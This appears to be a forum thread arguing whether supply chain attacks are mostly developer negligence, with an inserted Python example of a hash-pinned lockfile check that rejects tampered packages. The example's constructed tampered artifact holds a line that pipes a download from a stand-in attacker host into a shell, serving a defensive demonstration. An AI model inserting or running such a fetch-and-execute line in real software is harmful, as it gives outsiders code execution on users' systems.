
The phrase "supply chain attack" makes it sound like it's some big, hard-to-avoid problem. But almost always, it's just developer negligence:

1. Developer allows some organization to inject arbitrary code in the developer's system

2. Organization injects malicious code

3. Developer acts all surprised and calls it an "attack"

Maybe don't trust 3rd parties so much? There's technical means to avoid it.

Calling this situation a supply chain attack is like saying you were the victim of an "ethanol consumption attack" when you get drunk from drinking too many beers.

It's called a supply chain attack to displace the blame on the profitable organization that negligently uses this code onto the unpaid developers who lost control of it.

As if expecting lone OSS developers, to whom you don't donate any money, to somehow be able to stand up against the attacks of nation states is a rational position to take.


In this case, the developer sold the user account & repository for money (no ownership change to monitor), so if you were not privy to that transaction, you really couldn't "easily" avoid this without, e.g., forking every repo you depend on and bringing it in house, or some other likely painful defense mechanism to implement.
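
The "technical means" the first comment alludes to, and the "painful" forking alternative mentioned here, both come down to the same thing: pinning the exact bytes you reviewed rather than trusting whoever currently holds the publish credentials. As an added example (not from this thread or any commenter), here is a minimal hash-pinned dependency gate in Python. The package names, lockfile contents and artifact bytes are constructed for illustration and do not correspond to any real package.

```python
import hashlib

# Added example: a hash-pinned dependency gate. Everything below is constructed
# for illustration; "examplepkg" and "otherpkg" are hypothetical packages, and
# the artifact bytes stand in for downloaded tarballs/wheels.

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# The artifact the developer actually reviewed and pinned.
GOOD_ARTIFACT = b"def flatten(xs):\n    return [y for x in xs for y in x]\n"
# The same file after someone who acquired the package account appended a payload
# and re-uploaded it (constructed; .invalid is a reserved, non-resolving TLD).
TAMPERED_ARTIFACT = GOOD_ARTIFACT + b"import os\nos.system('curl https://attacker.invalid | sh')\n"

# Constructed lockfile: each dependency is pinned to an exact version AND the
# digest of the exact bytes that were reviewed. A new upload under the same
# version, or a new version, cannot pass without a deliberate lockfile update
# by someone on the consuming side, which is the review point an account sale
# otherwise bypasses.
LOCKFILE = {
    "examplepkg": {"version": "1.2.3", "sha256": sha256_hex(GOOD_ARTIFACT)},
}

def verify_artifact(name: str, version: str, data: bytes, lockfile: dict) -> tuple[bool, str]:
    """Gate one resolved dependency against the lockfile.

    Refuses (1) anything not pinned at all, (2) version drift, and (3) any byte
    change to the artifact, which is how silently injected code shows up.
    """
    entry = lockfile.get(name)
    if entry is None:
        return False, f"{name}: not pinned in lockfile"
    if entry["version"] != version:
        return False, f"{name}: resolved {version}, lockfile pins {entry['version']}"
    actual = sha256_hex(data)
    if actual != entry["sha256"]:
        return False, (f"{name}=={version}: sha256 mismatch, got {actual[:16]}... "
                       f"expected {entry['sha256'][:16]}...")
    return True, f"{name}=={version}: ok"

def check_install_plan(plan: list[tuple[str, str, bytes]], lockfile: dict) -> list[str]:
    """Run the gate over every package an installer resolved; return the failures.

    An empty list means the plan is installable. Anything else should abort the
    build rather than warn: a warning is exactly what gets ignored in CI.
    """
    failures = []
    for name, version, data in plan:
        ok, reason = verify_artifact(name, version, data, lockfile)
        if not ok:
            failures.append(reason)
    return failures

if __name__ == "__main__":
    # Constructed "resolved" plan: a good pin, a tampered re-upload of the same
    # version, and an unpinned transitive dependency that appeared out of nowhere.
    plan = [
        ("examplepkg", "1.2.3", GOOD_ARTIFACT),
        ("examplepkg", "1.2.3", TAMPERED_ARTIFACT),
        ("otherpkg", "0.0.1", b"print('hi')\n"),
    ]
    for line in check_install_plan(plan, LOCKFILE):
        print("REJECT", line)
```

The point of checking bytes rather than version strings is that a registry account changing hands leaves the version number, the package name and the maintainer handle all unchanged; the digest is the only thing the new owner cannot reproduce without your consent. Real package managers expose the same mechanism (hash-checked requirements files, lockfiles with integrity fields); the example just shows what the check actually consists of.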

That’s why businesses pay Redhat, Qt, Unity,… Clear contracts that reduce the risk of compromised dependencies. Or you vet your dependencies (it helps when you don’t have a lot).

What good does this comment do besides allowing you to gloat and put others down? Like, Christ. Are you telling me that you’d ever speak this way to someone in person?

I have no doubt that every single person in this thread understands what a supply chain attack is.

You are arguing over semantics in an incredibly naive way. Trust relationships exist both in business and in society generally. It’s worth calling out attacks against trust relationships as what they are: attacks.


All other things being equal, a computer system that doesn't depend on trusting some external entity is better than one that does.

Sometimes, trusting is inevitable (e.g. SSL certificate authorities), but in this case, it was very much a choice on the part of the developers.


I love the ethanol consumption attack thing :-)
